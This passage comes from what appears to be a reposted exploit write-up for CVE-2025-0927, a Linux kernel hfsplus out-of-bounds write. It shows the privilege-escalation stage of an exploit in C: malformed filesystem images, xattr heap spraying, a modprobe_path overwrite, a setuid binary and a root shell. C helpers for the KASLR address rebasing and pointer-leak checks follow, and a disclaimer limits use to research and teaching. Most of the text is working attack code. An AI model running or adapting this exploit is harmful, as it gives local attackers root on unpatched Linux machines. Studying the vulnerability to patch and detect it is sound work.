    release_keys(id_buffer, SPRAY_KEY_SIZE_INIT);

    exit_child();

    waitpid(pid, &status, 0);

    printf("[+] Waitpid status %d\n", status);

/* LPE part */

    prepare_filesystem(hack_hfs_modprobe_one, "/tmp/malformed_mod_1.raw", kaslr_base_recovered);

    qemu_mount_oracle("/tmp/malformed_mod_1.raw", "/dev/loop2", "/tmp/mnt1/");

    prepare_filesystem(hack_hfs_modprobe_two, "/tmp/malformed_mod_2.raw", kaslr_base_recovered);

    qemu_mount_oracle("/tmp/malformed_mod_2.raw", "/dev/loop3", "/tmp/mnt2/");

    unshare_setup_xattr(getuid(), getgid());

    printf("UID: %d, GID: %d\n", getuid(), getgid());

    prepare_tmpfs();

    spray_xattr(); 

    trigger_oob_xattr();

    check_for_modprobe_overwrite_one(); 

    spray_xattr_two();

    trigger_oob_xattr_two();

    check_for_modprobe_overwrite_two(); 

    set_myself_suid(path);

    printf("[+] Escalating privileges\n");

    sem_post(sem_pop_shell);
    wait(NULL);
    sleep(0x100000); 
}
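
The payload fix-up in hack_hfs_modprobe_one and hack_hfs_modprobe_two is plain address arithmetic: subtract the compile-time KERNEL_BASE from the symbol address, add the recovered base, and store the result byte by byte in little-endian order. A minimal, self-contained sketch of that step follows. The helper names rebase_address, store_le64, load_le64 and check_rebase are hypothetical and do not appear in the listing above; the two constants are the ones quoted in its comments.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: translate an address known relative to a static
 * image base into the corresponding address under a different base. */
static uint64_t rebase_address(uint64_t static_addr, uint64_t static_base,
                               uint64_t runtime_base)
{
    return static_addr - static_base + runtime_base;
}

/* Store a 64-bit value into buf in little-endian byte order. */
static void store_le64(uint8_t *buf, uint64_t value)
{
    for (int i = 0; i < 8; i++)
        buf[i] = (uint8_t)((value >> (8 * i)) & 0xFF);
}

/* Inverse of store_le64; the same loop shape as extract_pointer(). */
static uint64_t load_le64(const uint8_t *buf)
{
    uint64_t value = 0;

    for (int i = 0; i < 8; i++)
        value |= (uint64_t)buf[i] << (8 * i);
    return value;
}

/* Self-check: with an unchanged base, the encoded bytes match the first
 * eight bytes of the static payload array (38 f6 b3 82 ff ff ff ff). */
static void check_rebase(void)
{
    const uint64_t sym = 0xffffffff82b3f638ULL;  /* MODPROBE_ADDR_ONE */
    const uint64_t base = 0xffffffff81000000ULL; /* KERNEL_BASE */
    uint8_t buf[8];

    store_le64(buf, rebase_address(sym, base, base));
    assert(buf[0] == 0x38 && buf[1] == 0xf6 && buf[2] == 0xb3 && buf[3] == 0x82);
    assert(load_le64(buf) == sym);
}
```

Calling check_rebase() exercises the round trip. Keeping the arithmetic in one helper avoids repeating the subtraction and the byte loop in each mutator function.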

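
find_pointer_triples accepts a candidate only when all three leaked pointers differ from their expected static addresses by the same amount, and that shared difference is then added to KERNEL_BASE. The sketch below isolates that consistency check as a generic function. The names consistent_slide and check_consistent_slide are hypothetical, and the addresses in the self-check are made-up placeholders rather than the BASE_ADDR_* values the listing relies on.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper: given n observed values and the static addresses
 * they are expected to correspond to, report whether every pair implies
 * the same offset, and return that offset through slide_out. */
static bool consistent_slide(const uint64_t *observed, const uint64_t *expected,
                             int n, uint64_t *slide_out)
{
    if (n <= 0)
        return false;

    /* Unsigned subtraction wraps, so the comparison stays well defined
     * even when an observed value is below its expected address. */
    uint64_t slide = observed[0] - expected[0];

    for (int i = 1; i < n; i++) {
        if (observed[i] - expected[i] != slide)
            return false;
    }
    *slide_out = slide;
    return true;
}

/* Self-check with placeholder addresses. */
static void check_consistent_slide(void)
{
    const uint64_t expected[3] = {0x1000, 0x2000, 0x3000};
    const uint64_t good[3] = {0x1500, 0x2500, 0x3500};
    const uint64_t bad[3] = {0x1500, 0x2500, 0x3600};
    uint64_t slide = 0;

    assert(consistent_slide(good, expected, 3, &slide));
    assert(slide == 0x500);
    assert(!consistent_slide(bad, expected, 3, &slide));
}
```

Requiring agreement across several independent values is what keeps a single stray value that merely falls in the valid range from being mistaken for a real match.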

Originally published on the WeChat official account Ots安全: CVE-2025-0927: Linux Kernel hfsplus Slab Out-of-Bounds Write Analysis (EXP)

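Disclaimer: The programs and methods described in this article may be offensive in nature and are intended solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes none. Questions can be sent by email (a corporate or otherwise valid mailbox is recommended so the message is not blocked; contact details are on the home page).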
